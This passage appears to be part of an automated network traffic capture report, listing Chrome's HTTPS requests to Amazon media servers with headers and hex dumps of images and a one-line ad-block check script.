                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: a3 4a c8 5b 0d 0e 04 8a 48 d8 32 16 dd 4e f5 be 7b 25 67 fe bf be 6a 95 e2 b7 37 f6 b6 57 f7 b6 dd fd b2 4f 07 68 e7 46 c3 db fb f3 5b 9b 77 70 74 94 62 03 14 d5 83 5b d7 b7 97 d8 e2 4f c3 64 bf 7b 10 dc 37 bf 79 85 c8 9d 1c bc 9f 4a ee b6 13 a2 e8 d1 de 88 80 d0 09 d0 05 2e 15 30 4d 48 77 22 8e b8 c5 16 c9 ec 7d 9f 93 fd e3 41 d9 0b 2e 9a fe f9 aa 82 ea 7b bb 58 2c e4 17 77 17 69 1c d7 3d cd 9c 66 fe 07 95 5d a3 d2 12 eb df 95 e0 6d 5a 04 ba 91 d1 fa 04 2c 2f 9e 2b c3 de f1 51 12 77 84 ac 8a c5 93 f5 80 d9 91 b7 07 0c 0f 42 08 38 35 14 eb 55 82 c5 49 b1 ca d2 83 f8 11 c8 fa a7 68 3f 6f ef b5 45 fb 6b c0 20 b2 e1 57 12 a9 72 ca d0 e0 33 16 1b b8 5a 92 fd 5a 65 00 2d d4 a0 64 e4 77 92 b0 23 18 c6 f2 9f 9f 53 5c 4e d7 d9 7d 03 b3 f7 50 87 2f fa 58 8e a6 66
                                                                                                                                                                                                                                                                Data Ascii: J[H2N{%gj7WOhF[wptb[Od{7yJ.0MHw"}A.{X,wi=f]mZ,/+QwB85UIh?oEk Wr3ZZe-dw#S\N}P/Xf
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1363INData Raw: 18 c3 0d b0 af 97 91 13 c8 3c 6a 54 f5 60 d5 62 31 73 94 63 e3 a1 5d cb 2a 6f fb 3b 97 9e d1 78 3d 99 ee c5 c1 b8 75 f7 bb 85 d6 80 8e 78 73 84 d8 f4 0c c6 a2 fd a6 ed d7 0b e2 bc 36 5b 78 e4 68 e5 67 88 84 91 34 06 01 c1 d9 b7 4f 91 20 d7 e6 78 a7 91 60 99 23 ce 42 8c 01 cf 00 8c 81 8c 1f 77 23 03 98 a4 b3 c8 60 81 24 ce a2 a7 20 f3 c6 49 00 e7 27 dd c6 c7 90 ab f5 78 05 2a b1 9d bc 9b d6 2f 52 b5 1e 39 3a 32 85 cc 52 6d 49 69 f2 2d 78 a5 68 5b f8 8a f3 2c a6 46 24 d4 7b b3 93 34 96 6a 18 e4 a3 c8 b9 f4 ce a5 1f 20 d8 f9 57 72 bc d2 ea ce 56 d7 15 6d e5 bc 5b 87 43 d3 ad ae a3 73 42 95 cc 56 19 92 9f 51 4a 52 ab 93 8a 52 94 d0 24 54 a5 2a 62 b0 a5 29 40 12 1e c9 0c f1 4b 3f 8b fe 46 ab 47 8a 70 f9 ee 67 d7 01 c1 50 99 ca 07 1f a3 75 99 39 bc 64 65 97 07
                                                                                                                                                                                                                                                                Data Ascii: <jT`b1sc]*o;x=uxs6[xhg4O x`#Bw#`$ I'x*/R9:2RmIi-xh[,F${4j WrVm[CsBVQJRR$T*b)@K?FGpgPu9de


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                42192.168.2.44987518.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC621OUTGET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                Content-Length: 23
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 1c2db2f9-f34e-4690-8994-2a3f0d4349bc
                                                                                                                                                                                                                                                                Last-Modified: Mon, 28 Nov 2016 08:22:04 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-186,/images/G/01/csm/showads.v2
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-186 /images/G/01/csm/showads.v2
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 06:15:33 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=86400,public
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 23:06:26 GMT
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Via: 1.1 ef04b5bd9d63162000acde84eaab4f9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 25852
                                                                                                                                                                                                                                                                Server-Timing: cdn-cache-hit,cdn-pop;desc="AMS58-P5",cdn-rid;desc="XZtb77yFVaCkJvylNilJvfmhU-6o5fA5Ea9CgtRSJMBHJweRYA4v1w==",cdn-hit-layer;desc="EDGE",cdn-downstream-fbl;dur=1,provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: XZtb77yFVaCkJvylNilJvfmhU-6o5fA5Ea9CgtRSJMBHJweRYA4v1w==
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC23INData Raw: 77 69 6e 64 6f 77 2e 75 65 5f 61 64 62 5f 63 68 6b 20 3d 20 31 3b 0a
                                                                                                                                                                                                                                                                Data Ascii: window.ue_adb_chk = 1;


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                43192.168.2.44987618.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC608OUTGET /images/I/612naZmko3L._SX1500_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC796INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 74677
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 4cf802fe-ebc3-4ce5-9844-79e15120c24d
                                                                                                                                                                                                                                                                Date: Sun, 04 Aug 2024 10:11:45 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 30 Jul 2024 15:07:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-032,/images/I/612naZmko3L
                                                                                                                                                                                                                                                                Expires: Sat, 30 Jul 2044 10:11:45 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-032 /images/I/612naZmko3L
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Via: 1.1 039ee779486557ccf22d128d6266e00e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 387487
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: bDlBjVZLYhrnDDAwa0h0TTQCu3ywO0Hopk5BA70mSIWVs-CV6RdEBw==
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC15588INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                                Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC6153INData Raw: 5f 6e 78 3f d4 39 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 91 40 19 02 14 a5 04 29 9c a0 00 28 84 a0 52 03 20 b4 e4 b8 3b 0f 2e 7b df cc dc 1e df 4d 8d c7 1b 8c 40 2a e2 c4 4b 22 53 1b 09 8a 53 0b 85 5a b8 b1 c2 e3 02 55 89 2a 24 42 90 62 4b 04 b1 2c b2 cb 8d 91 16 62 96 58 ab 21 65 89 0c 69 2c b0 62 44 2c 48 b0 02 12 58 40 b2 5e 2f 83 77 53 10 00 00 00 ab ed bf 07 fa 82 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 14 00 00 01 66 45 85 5c 88 0a 0a 0a 42 94 a4 2c 50 0b 2a 00 05 19 14 e4 f8 3b 2f 80 fa ff 00 84 7c fb b9 f0 91 8c b0 63 71 80 8c 72 65 85 c6 c4 b0 b8 dc 22 01 8d c7 29 71 b3 1b 8e 29 12 ad 21 8d c6 cb 8d 91 22 40 4b 0b 2e 32 14 20 48 08 25 c9 71 b3 14 84 b2 18 ad 48 0c
                                                                                                                                                                                                                                                                Data Ascii: _nx?9J@)(R ;.{M@*K"SSZU*$BbK,bX!ei,bD,HX@^/wSfE\B,P*;/|cqre")q)!"@K.2 H%qH
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC2322INData Raw: 38 21 85 15 14 ca c9 bb 99 a8 e5 b7 90 47 01 1c dc b1 3d 70 05 1e 0f 2f 69 e8 ea c6 b4 dc 74 b1 a9 9f a9 ea 9b 4f 4d 6b 95 f1 68 f4 fd 8d f6 f7 6a 3a 91 3e a7 4a cc 0c aa d4 36 39 95 ef a1 73 6e 14 7a 7e cc eb 70 be 55 0a 9a 9b 4e 9f 93 5b 4f a7 ec 33 28 26 57 dd 19 26 e3 7e b2 1b 8a a8 7b 6d 54 98 35 dd a6 b2 50 bb 52 d9 6d ff 00 4c 91 a7 e7 fc 7a ed 65 fe 7b 97 fb 7f 3a 1c bd 3f fe dc cc 86 15 f5 7f 2d 2e 65 70 9c fb 9c e9 33 5f 2e 59 2b 4c 53 42 a2 4c be e7 4b 91 dc e9 e0 4b 75 35 5b a6 a6 dc 5d 32 a2 9a 9c 3e 5b a6 16 29 a2 2d 73 7b 45 4c b8 a8 4c 90 68 ae 42 71 70 8a 38 49 fc 7a e7 f3 5c 53 65 09 cd ab a6 34 cf 0a 18 42 1c 03 01 80 c0 a0 80 41 5d ae 83 49 db c9 27 9a 47 34 62 44 70 8c 78 3c bd a6 d7 16 96 6a 4a b6 09 f5 0f 9e ea 49 ed 6d 03 f5 05 53
                                                                                                                                                                                                                                                                Data Ascii: 8!G=p/itOMkhj:>J69snz~pUN[O3(&W&~{mT5PRmLze{:?-.ep3_.Y+LSBLKKu5[]2>[)-s{ELLhBqp8Iz\Se4BA]I'G4bDpx<jJImS
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC8949INData Raw: 2f e8 44 99 2e 9c ed d8 d5 22 cb 4c 70 87 10 30 54 f3 13 9b 03 e0 87 28 f0 11 c5 1e 9f d0 8a cb ac bd 29 6f ae ad 99 5b 37 82 3c 20 a9 6e f8 83 c1 8e 71 1c 3e 5f d0 7b 35 bd 95 0e dc 4d 66 ed 4f 5a 78 e3 c1 2d e5 a4 90 e1 e1 33 e6 91 fd 0b a6 a6 7d 4b f7 77 56 b6 8e 51 e6 c8 9b da 5c de d3 e3 08 e1 23 1f 2f e8 35 fa f8 dd 1d 6f 9f 39 d3 9d c6 30 8f 00 2a 4b fb c7 85 3c 82 38 08 c7 cb fa 0b 69 a6 95 2d ba cf 56 4d d4 d5 a4 a3 c7 1e 36 98 2e ef 88 3c 6e 5c 04 61 e5 fd 04 a0 a1 7d 6c dd dc d6 2c 9c e4 79 f1 52 66 76 17 b6 1e 10 28 73 48 5e 5f d0 4d 67 a8 ff 00 47 d0 39 d1 e5 c3 82 08 60 3a 2a 77 f7 22 21 e3 4f 0c 3d f0 1e 12 89 f2 6d 74 fa 93 50 4e be d5 f8 36 94 1d f1 07 85 3c 83 c1 e5 fd 02 b4 db 5d 5f 37 75 35 b3 6f 33 cf 04 3a 70 41 1e 44 70 05 4b 99 da
                                                                                                                                                                                                                                                                Data Ascii: /D."Lp0T()o[7< nq>_{5MfOZx-3}KwVQ\#/5o90*K<8i-VM6.<n\a}l,yRfv(sH^_MgG9`:*w"!O=mtPN6<]_7u5o3:pADpK
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC16384INData Raw: d7 6f 9e 94 df 2b 6d e2 c7 4b ac 34 ae aa dd 4d c4 a5 ae 91 a0 b7 02 b6 f7 5f b7 7b bd bc 94 54 9b 7f 4f a7 2e 54 36 ed ab a6 b0 6a 7b de e1 ea 5d 1d 5f ab 2c 5b 9b 49 3e b6 86 b2 fb a4 76 a5 3b 72 6d 56 eb fb 3f 92 3f 97 3a a3 50 cd be 3b d3 57 a6 1b c6 e7 e8 2d 80 f4 69 2f 40 6a 2c b1 cb 82 08 70 41 43 11 89 eb 84 22 8f 00 c6 86 7d 26 98 b7 ea 2b ed 56 a5 b8 9e aa 73 04 d6 34 19 2e f1 8d 31 e4 03 0e 2f 2f 76 8a d4 3a 7e 46 a0 a5 f5 4f 42 fd 1f bc 93 3d 5e 6d 5d 4d 45 b7 d6 6e d4 c9 14 fe af f6 42 a8 37 d5 c6 c8 76 ea 3d 4b e9 03 55 cd a8 a3 f4 e5 29 fa 43 53 ec a6 91 bc 5d f7 0f 65 35 3d e6 db b9 1e 98 ed c6 5f a9 1d 80 92 ca 8f 55 7b 0b 42 cd 7b eb fb 42 d3 cb dc 2f 52 4f d5 73 ef 7a c6 75 d9 c1 d2 a7 ba e6 ea 26 52 ff 00 1b 05 8f d8 88 40 9e 98 94 42
                                                                                                                                                                                                                                                                Data Ascii: o+mK4M_{TO.T6j{]_,[I>v;rmV??:P;W-i/@j,pAC"}&+Vs4.1//v:~FOB=^m]MEnB7v=KU)CS]e5=_U{B{B/ROszu&R@B
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC16384INData Raw: fe 91 a6 f8 f1 87 32 d9 8f fb c6 9b e3 c6 1c cb 66 fd 21 4f f1 e2 47 99 ac a1 43 71 b8 d3 7c 78 ee f3 35 94 ff 00 bc 69 be 3c 61 cc 96 6f d2 14 ff 00 1e 30 e6 2b 41 ff 00 5f a7 f8 f1 87 30 5a 4f fa f3 1f 1e 30 bf 5a cf fa eb 1f 1a 19 77 99 39 9a d7 4c 1f 2a 4b 7f ca 50 b2 a2 99 13 82 0a 8c 84 c6 27 0c 63 fb e1 6c f9 c5 7c 58 9a b9 c6 d6 3c 6e 2b e2 c7 73 9c 6d 66 5d 4e 2b e2 c7 f7 c2 d9 f3 8a f8 b0 d5 c6 87 98 2d 6e 53 be 84 b8 da c5 6b 22 69 50 98 32 2a 98 98 3b e3 1b f5 ab f9 eb 1f 1e 31 e6 0b 4f f3 e6 3e 3c 63 cc 56 81 fe bf 4f f1 e3 1e 63 b3 fe 90 a7 f8 f1 8f 32 d9 bf 48 53 7c 78 c7 99 ac bf a4 69 be 3c 48 f3 3d 92 7f ed 2a 6f 8f 13 1c cb 66 97 5f d6 14 ff 00 1e 12 da 79 92 cc 54 a2 02 47 d6 14 f3 24 e4 07 7f 38 4b ec 29 2b 6d 69 0a 4a d2 41 4a 81 c4
                                                                                                                                                                                                                                                                Data Ascii: 2f!OGCq|x5i<ao0+A_0ZO0Zw9L*KP'cl|X<n+smf]N+-nSk"iP2*;1O><cVOc2HS|xi<H=*of_yTG$8K)+miJAJ
                                                                                                                                                                                                                                                                2024-08-12 13:23:27 UTC8897INData Raw: cc 90 00 9e 8d e7 00 3b 62 96 e5 55 57 42 8a 64 15 21 f5 53 d4 39 c4 2c b8 82 db 81 32 40 c4 a1 44 27 11 23 23 ba 1a 61 d7 6c ae ad 08 09 5a ca 95 df 20 48 9c 51 3c 66 7e d7 54 0b 33 f5 36 fd 4d 57 2e a5 a6 c3 ab e1 84 3a d2 50 b1 e6 48 1d 48 49 48 96 f5 e3 33 8a 16 85 db 1b 5b 60 04 96 de 52 4c c6 4a 98 47 9d db 9c 56 dd a9 9d b7 ba d5 5b ee 54 02 b7 54 87 02 9e ef b8 92 4a 0e 09 70 a8 23 76 8d 22 58 4a 2b ed e1 eb 7b 0d 56 b0 12 02 1f 59 49 75 b7 9b 79 1a 80 40 ee 9d 05 04 9c 92 b3 81 80 c5 35 3d 95 43 56 a0 a5 d6 10 ae a9 4f 85 97 64 2a df ce 2e 52 a9 e5 90 52 8a 67 94 f0 49 49 29 07 5a 92 99 cd 01 03 2f 83 28 6a b5 39 b6 74 1f 11 cb ed ec c7 64 cc 61 d3 96 c2 82 3b c3 23 05 b5 e6 36 35 6c a4 c1 4e 19 a9 5b 92 81 9a 8f 8a 1a f5 7f cb 8b 95 a2 d8 64 f1
                                                                                                                                                                                                                                                                Data Ascii: ;bUWBd!S9,2@D'##alZ HQ<f~T36MW.:PHHIH3[`RLJGV[TTJp#v"XJ+{VYIuy@5=CVOd*.RRgII)Z/(j9tda;#65lN[d


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                44192.168.2.449882151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC375OUTGET /images/S/sash/Z8YwjOjqIHxqujG.png HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 45977
                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 660b3c6d-b61b-4d1d-a46e-6d434f8f30e8
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Fri, 05 Jul 2024 14:44:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Mon, 04 Jul 2044 13:11:11 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:26 GMT
                                                                                                                                                                                                                                                                Age: 1810858
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100072-IAD, cache-nyc-kteb1890093-NYC
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c2 00 00 01 27 08 06 00 00 00 fb 1f 9c b4 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 0a 4b 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 48 89 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 54 69 a2 12 92 00 a1 84 18 12 40 ec 88 a8 c0 88 a2 22 82 15 19 14 71 c0 d1 11 90 b1 22 8a 85 41 b1 f7 01 79 08 28 e3 e0 28 36 54 de 0f de 1a 7d b3 e6 bd 37 6f f6 af bd f6 39 67 9d ef 9c 7d 3e 00 46 60 b0 44 9a 85 aa 01 64 4a 15 f2 88 00 1f 3c 36 2e 1e 27 77 03 0a 54 20 81 03 80 40 98 2d 0b 89 f4 8f 02 00 e0 fb f1 f0 ec 88 00 1f f8 02 04 e0 cd 6d 40 00 00 6e d8 04 86 e1 38 fc 7f 50 17 ca e4 0a 00 24 0c 00 a6 8b c4 d9 42 00 a4 10 00 32 72 15 32 05 00
                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR'gAMAaKiCCPsRGB IEC61966-2.1HSgTS=BKKoR RBTi@"q"Ay((6T}7o9g}>F`DdJ<6.'wT @-m@n8P$B2r2
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: 9f a6 bf 45 ff 94 fe b0 01 cb 60 96 81 c4 60 8b c1 69 83 67 b8 26 ee 8d 67 e0 95 78 07 3e 6a a8 6b 18 68 a8 34 dc 6b d8 6d 38 6e 64 6e 34 d7 a8 c0 a8 c9 e8 91 31 cd 98 6b 9c 6c bc c5 b8 dd 78 d4 c4 c0 24 c4 64 a9 49 83 c9 7d 53 aa 29 d7 34 d5 74 9b 69 a7 e9 5b 33 73 b3 18 b3 b5 66 2d 66 43 e6 5a e6 7c f3 7c f3 06 f3 87 16 4c 0b 4f 8b 45 16 35 16 37 2d 49 96 5c cb 74 cb 9d 96 d7 ac 50 2b 27 ab 54 ab 6a ab ab d6 a8 b5 b3 b5 c4 7a a7 75 cf 34 e2 34 d7 69 d2 69 35 d3 ee d8 30 6c bc 6d 72 6c 1a 6c fa 6c 39 b6 c1 b6 05 b6 2d b6 2f ec 4c ec e2 ed 36 d9 75 da 7d b6 77 b2 cf b0 af b5 7f e0 a0 e1 30 db a1 c0 a1 cd e1 37 47 2b 47 a1 63 b5 e3 cd e9 cc e9 fe d3 57 4c 6f 9d fe 72 86 f5 0c f1 8c 5d 33 ee 3a b1 9c 42 9c d6 3a b5 3b 7d 72 76 71 96 3b 37 3a 0f bb 98 b8 24
                                                                                                                                                                                                                                                                Data Ascii: E``ig&gx>jkh4km8ndn41klx$dI}S)4ti[3sf-fCZ||LOE57-I\tP+'Tjzu44ii50lmrlll9-/L6u}w07G+GcWLor]3:B:;}rvq;7:$
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: 01 00 9a 9c 18 00 00 07 73 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d
                                                                                                                                                                                                                                                                Data Ascii: siTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-
                                                                                                                                                                                                                                                                2024-08-12 13:23:26 UTC1378INData Raw: 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 47 69 6d 70 20 32 2e 31 30 20 28 4d 61 63 20 4f 53 29 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 32 2d 30 35 2d 30 36 54 31 37 3a 31 36 3a 32 39 2b 30 32 3a 30 30 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 35 38 34 31 32 35 63 63 2d 63 35 30 66 2d 34 36 38 39 2d 39 32 32 37 2d 36 66 66 63 35 38 37 31 38 64 65 62 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 34 2d 30 37 2d 30 35 54 31 35 3a 32 37 3a 33 36 2b 30 31 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39
                                                                                                                                                                                                                                                                Data Ascii: stEvt:softwareAgent="Gimp 2.10 (Mac OS)" stEvt:when="2022-05-06T17:16:29+02:00"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:584125cc-c50f-4689-9227-6ffc58718deb" stEvt:when="2024-07-05T15:27:36+01:00" stEvt:softwareAgent="Adobe Photoshop 25.9
